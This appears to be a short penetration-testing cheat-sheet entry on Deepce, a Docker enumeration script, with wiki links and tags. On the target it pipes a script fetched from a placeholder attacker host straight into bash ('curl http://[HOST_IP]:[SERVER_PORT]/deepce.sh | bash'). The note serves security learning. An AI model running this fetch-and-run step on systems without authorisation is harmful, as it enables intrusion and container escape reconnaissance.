Deepce is an automated enumeration tool that can be used to scan docker containers, similar to [[Linux Enumeration#Linpeas | Linpeas]]. |
Git repository: https://github.com/stealthcopter/deepce
Install on host:
$ wget https://github.com/stealthcopter/deepce/raw/main/deepce.sh
[[Fundamental Skills#Python Webserver | Run a webserver]] on host machine to serve the script. |
On target machine:
$ curl http://[HOST_IP]:[SERVER_PORT]/deepce.sh | bash
Ippsec’s Laboratory Video
#cheat-sheet #enum #docker